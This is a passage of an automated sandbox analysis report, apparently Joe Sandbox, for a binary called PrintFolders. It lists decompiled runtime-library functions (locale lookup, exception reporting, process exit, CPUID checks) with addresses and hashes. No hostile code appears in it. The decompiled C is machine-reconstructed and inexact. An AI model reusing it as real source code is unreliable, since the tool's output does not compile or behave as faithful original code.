0x0042789c
0x004278ac
0x004278b2
0x004278b4
0x00000000
0x00000000
0x004278bc
0x004278cb
0x004278d1
0x004278d3
0x00000000
0x00000000
0x004278dd
0x004278e5
0x00000000
0x004278ea
0x004277af
0x004277be
0x004277c3
0x004277c8
0x00427818
0x00427818
0x00427818
0x0042781a
0x0042781e
0x00000000
0x00000000
0x00000000
0x0042781e
0x004277ca
0x004277cc
0x004277d0
0x004277e2
0x004277e6
0x004277eb
0x004277eb
0x00000000
0x004277eb
0x004277d2
0x004277d5
0x00000000
0x00000000
0x004277db
0x00000000
0x004277db
0x0042778b
0x0042778e
0x00000000
0x00000000
0x00427794
0x00000000
0x00427794

APIs

Part of subcall function 0041CB63: GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,74CB6490,?,0041828D,00405D9E,00000000), ref: 0041CB68
Part of subcall function 0041CB63: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,74CB6490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06

Part of subcall function 0041CB63: _free.LIBCMT ref: 0041CBC5
Part of subcall function 0041CB63: _free.LIBCMT ref: 0041CBFB

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0042780C
IsValidCodePage.KERNEL32(00000000), ref: 00427855
IsValidLocale.KERNEL32(?,00000001), ref: 00427864
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004278AC
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004278CB

Strings

)C, xrefs: 004277B9

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: )C
API String ID: 949163717-1336023901
Opcode ID: d6733786ce1444d89c0ece45410b3c14b7f86884eb63135eb5ebf69e9976cec0
Instruction ID: 8ad3d2252febc303d5905dee770c0fca35b5db36d8f6aca9aad01a9d0ac59951
Opcode Fuzzy Hash: d6733786ce1444d89c0ece45410b3c14b7f86884eb63135eb5ebf69e9976cec0
Instruction Fuzzy Hash: 74518671B042259BDB10EF65EC45EBF73B8EF44700F94447AE900E7250E7789944CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042752B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0042752B(void* __ecx, signed int _a4, intOrPtr _a8) {
				char _v8;
				int _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t10 =  &_v8; // 0x427849
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004, _t10, 2) != 0) {
						_t13 =  &_v8; // 0x427849
						_t17 =  *_t13;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0041C802(_t23, _t23);
									goto L25;
								}
								_t6 =  &_v8; // 0x427849
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b, _t6, 2) == 0) {
									goto L22;
								}
								_t9 =  &_v8; // 0x427849
								_t17 =  *_t9;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x00427530
0x00427531
0x00427538
0x004275dc
0x004275de
0x004275f5
0x004275fb
0x004275fb
0x00427600
0x00427602
0x00427602
0x00427608
0x0042760b
0x0042760b
0x004275f7
0x004275f7
0x00000000
0x004275f7
0x0042753e
0x00427543
0x00000000
0x00000000
0x00427549
0x0042754e
0x00427550
0x00427550
0x00427556
0x00000000
0x00000000
0x0042755b
0x00427572
0x00427572
0x0042757b
0x0042757d
0x00000000
0x00000000
0x0042757f
0x00427584
0x00427586
0x00427586
0x0042758c
0x00000000
0x00000000
0x00427591
0x004275af
0x004275b1
0x004275d4
0x00000000
0x004275d9
0x004275b5
0x004275cc
0x00000000
0x00000000
0x004275ce
0x004275ce
0x00000000
0x004275ce
0x00427593
0x0042759b
0x00000000
0x00000000
0x0042759d
0x004275a0
0x004275a6
0x00000000
0x00000000
0x00000000
0x004275a8
0x004275aa
0x004275ac
0x00000000
0x004275ac
0x0042755d
0x00427565
0x00000000
0x00000000
0x00427567
0x0042756a
0x00427570
0x00000000
0x00000000
0x00000000
0x00427570
0x00427576
0x00427578
0x00000000

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,IxB,00000002,00000000,?,?,?,00427849,?,00000000), ref: 004275C4
GetLocaleInfoW.KERNEL32(00000000,20001004,IxB,00000002,00000000,?,?,?,00427849,?,00000000), ref: 004275ED
GetACP.KERNEL32(?,?,00427849,?,00000000), ref: 00427602

Strings

ACP, xrefs: 00427549
OCP, xrefs: 0042757F
IxB, xrefs: 004275DE, 004275FB, 004275B5, 004275CE, 004275B8, 004275E1

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$IxB$OCP
API String ID: 2299586839-4141542707
Opcode ID: d473ddd763a2c2c897fe5dcf6db478f1cae410dc6a90a74f6531b1057af5c91b
Instruction ID: 80627bc4f1190bcbfed89345fe7bf2f4b32af40f38ec4df066e79ffa23b7ef9e
Opcode Fuzzy Hash: d473ddd763a2c2c897fe5dcf6db478f1cae410dc6a90a74f6531b1057af5c91b
Instruction Fuzzy Hash: B821B832709121BAD734CF18E901A97F3A6EB54B60BD68476E909D7600E735DE81C35C

Uniqueness

Uniqueness Score: -1.00%

Function 10003AD4 Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10003AD4(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E10003BEF(_t34);
				 *_t60 = 0x2cc;
				_v632 = E10004730(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E10004730(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E10003BEF(_t49);
				}
				return _t49;
			}

0x10003ad4
0x10003ad4
0x10003ad4
0x10003ae8
0x10003aea
0x10003aed
0x10003aed
0x10003af1
0x10003af6
0x10003b0e
0x10003b14
0x10003b1a
0x10003b20
0x10003b26
0x10003b2c
0x10003b32
0x10003b39
0x10003b40
0x10003b47
0x10003b4e
0x10003b55
0x10003b5c
0x10003b5d
0x10003b66
0x10003b6c
0x10003b6f
0x10003b75
0x10003b84
0x10003b90
0x10003b9b
0x10003ba2
0x10003ba9
0x10003bb4
0x10003bbc
0x10003bc5
0x10003bc7
0x10003bca
0x10003bcc
0x10003bd6
0x10003bde
0x10003be4
0x00000000
0x10003beb
0x10003bee

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10003AE0
IsDebuggerPresent.KERNEL32 ref: 10003BAC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10003BCC
UnhandledExceptionFilter.KERNEL32(?), ref: 10003BD6

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 87d6071aa85ca3aceb4d5d49843fcbf5a144f8cfc35fef28e923873c0919a720
Instruction ID: 6c05d683b9c83b65af34da63d054ec9b8364850d5d560307e6d3fdc6a332805a
Opcode Fuzzy Hash: 87d6071aa85ca3aceb4d5d49843fcbf5a144f8cfc35fef28e923873c0919a720
Instruction Fuzzy Hash: 7E311875D052189BEB11DFA4D989BCDBBB8EF08344F1080AAE54CAB254EB719A848F05

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5F5 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040F5F5(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E0040F7EB(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00410B00(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00410B00(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E0040F7EB(_t49);
				}
				return _t49;
			}

0x0040f5f5
0x0040f5f5
0x0040f5f5
0x0040f609
0x0040f60b
0x0040f60e
0x0040f60e
0x0040f612
0x0040f617
0x0040f62f
0x0040f635
0x0040f63b
0x0040f641
0x0040f647
0x0040f64d
0x0040f653
0x0040f65a
0x0040f661
0x0040f668
0x0040f66f
0x0040f676
0x0040f67d
0x0040f67e
0x0040f687
0x0040f68d
0x0040f690
0x0040f696
0x0040f6a5
0x0040f6b1
0x0040f6bc
0x0040f6c3
0x0040f6ca
0x0040f6d5
0x0040f6dd
0x0040f6e6
0x0040f6e8
0x0040f6eb
0x0040f6ed
0x0040f6f7
0x0040f6ff
0x0040f705
0x00000000
0x0040f70c
0x0040f70f

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040F601
IsDebuggerPresent.KERNEL32 ref: 0040F6CD
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F6ED
UnhandledExceptionFilter.KERNEL32(?), ref: 0040F6F7

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b905c57fb93a7ea2142a1a6e2d5c4873a38ca60d89c803f25540929c33dac397
Instruction ID: e08a22daeabf917fd0aba5c617d7a5f2469330a7746797e8074d373f0119b78b
Opcode Fuzzy Hash: b905c57fb93a7ea2142a1a6e2d5c4873a38ca60d89c803f25540929c33dac397
Instruction Fuzzy Hash: 7131FA75D052189BDB20DFA5D989BCDBBB8BF08304F1041BAE409A7290EB755A89CF49

Uniqueness

Uniqueness Score: -1.00%

Function 10006180 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E10006180(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x10017004; // 0x79eab102
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E10003BEF(_t41);
					_pop(_t61);
				}
				E10004730(_t66,  &_v804, 0, 0x50);
				E10004730(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E10003BEF(_t57);
				}
				return E100031FF(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x10006180
0x10006180
0x10006180
0x1000618b
0x10006190
0x10006192
0x1000619a
0x1000619c
0x1000619f
0x100061a4
0x100061a4
0x100061b0
0x100061c3
0x100061d1
0x100061d7
0x100061dd
0x100061e3
0x100061e9
0x100061ef
0x100061f5
0x100061fb
0x10006201
0x10006207
0x1000620e
0x10006215
0x1000621c
0x10006223
0x1000622a
0x10006231
0x10006232
0x1000623b
0x10006241
0x10006244
0x1000624a
0x10006257
0x10006260
0x10006269
0x10006272
0x10006280
0x10006282
0x10006297
0x100062a3
0x100062a6
0x100062ab
0x100062b8

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10006278
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 10006282
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 1000628F

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9a692d0d77a07a7f37119dcdd5ace2a3b37eeee0a1bfcb31a8054ad36fdd368c
Instruction ID: abb11d6b70c581ee1350689d9832688372e2db19cf6905fbf3b29f181f2760c3
Opcode Fuzzy Hash: 9a692d0d77a07a7f37119dcdd5ace2a3b37eeee0a1bfcb31a8054ad36fdd368c
Instruction Fuzzy Hash: F431C4749012289BDB21DF68DC89BCDBBB8FF08350F5041EAE41CA7251EB709B858F45

Uniqueness

Uniqueness Score: -1.00%

Function 0041336B Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E0041336B(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x43d054; // 0x7bd02ead
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0040F7EB(_t41);
					_pop(_t61);
				}
				E00410B00(_t66,  &_v804, 0, 0x50);
				E00410B00(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E0040F7EB(_t57);
				}
				return E0040EBBF(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x0041336b
0x0041336b
0x0041336b
0x00413376
0x0041337b
0x0041337d
0x00413385
0x00413387
0x0041338a
0x0041338f
0x0041338f
0x0041339b
0x004133ae
0x004133bc
0x004133c2
0x004133c8
0x004133ce
0x004133d4
0x004133da
0x004133e0
0x004133e6
0x004133ec
0x004133f2
0x004133f9
0x00413400
0x00413407
0x0041340e
0x00413415
0x0041341c
0x0041341d
0x00413426
0x0041342c
0x0041342f
0x00413435
0x00413442
0x0041344b
0x00413454
0x0041345d
0x0041346b
0x0041346d
0x00413482
0x0041348e
0x00413491
0x00413496
0x004134a3

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00413463
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0041346D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0041347A

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 08f293217c44ab737df140b6d3b84d0e147ad2ade69c0ac62fd1d43b73898614
Instruction ID: eed5281d3674d54920691af3d978e0505281e735928a2e98dc149aff2d4c60b5
Opcode Fuzzy Hash: 08f293217c44ab737df140b6d3b84d0e147ad2ade69c0ac62fd1d43b73898614
Instruction Fuzzy Hash: 9131C4749012289BCB21DF69DC89BDDBBB4BF08714F5041EAE41CA7290E7749B858F49

Uniqueness

Uniqueness Score: -1.00%

Function 10006CE1 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10006CE1(int _a4) {
				void* _t14;

				if(E100091C7(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E10006D66(_t14, _a4);
				ExitProcess(_a4);
			}

0x10006cee
0x10006d0a
0x10006d0a
0x10006d13
0x10006d1c

APIs

GetCurrentProcess.KERNEL32(10007C68,?,10006CE0,10002482,?,10007C68,10002482,10007C68), ref: 10006D03
TerminateProcess.KERNEL32(00000000,?,10006CE0,10002482,?,10007C68,10002482,10007C68), ref: 10006D0A
ExitProcess.KERNEL32 ref: 10006D1C

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b48507955d557410ab621ea9767185c5b28cf2fcba806ca0d5141bf90050bc88
Instruction ID: 8090ae278696ef8d63f7159b1b54225b98daf67b6e3b66e302f5d8a45b402e03
Opcode Fuzzy Hash: b48507955d557410ab621ea9767185c5b28cf2fcba806ca0d5141bf90050bc88
Instruction Fuzzy Hash: 6EE08C31600148AFEB12EF60CD48B493B6AFB092C1F208415F8058A131CBB6ED91CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7F3 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040F7F3(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x45054c =  *0x45054c & 0x00000000;
				 *0x43d060 =  *0x43d060 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x450550; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x450550 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x43d060; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x45054c = 1;
					 *0x43d060 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x45054c = 2;
						 *0x43d060 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x43d060; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x45054c = 3;
								 *0x43d060 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x45054c = 5;
									 *0x43d060 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x43d060 =  *0x43d060 | 0x00000040;
										 *0x45054c = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x450550; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x450550 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x0040f7f3
0x0040f7f6
0x0040f800
0x0040f811
0x0040f9c0
0x0040f9c3
